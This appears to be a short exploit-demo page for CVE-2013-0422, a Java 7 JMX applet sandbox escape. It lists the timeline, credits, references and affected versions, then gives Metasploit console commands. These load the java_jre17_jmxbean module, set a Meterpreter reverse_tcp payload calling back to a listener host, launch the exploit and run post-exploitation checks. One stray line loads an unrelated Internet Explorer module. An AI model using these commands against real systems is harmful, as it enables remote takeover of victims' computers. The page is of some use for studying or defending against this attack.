Java Applet JMX 0day Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild by kafeine on 2013-01-10
Metasploit PoC provided on 2013-01-10

PoC provided by :

Unknown
egypt
sinn3r
juan vazquez

Reference(s) :

CVE-2013-0422
OSVDB-89059
0 day 1.7u10 spotted in the Wild – Disable Java Plugin NOW !

Affected version(s) :

Oracle Java SE 7 Update 10 and below

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java SE 7 Update 10

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid
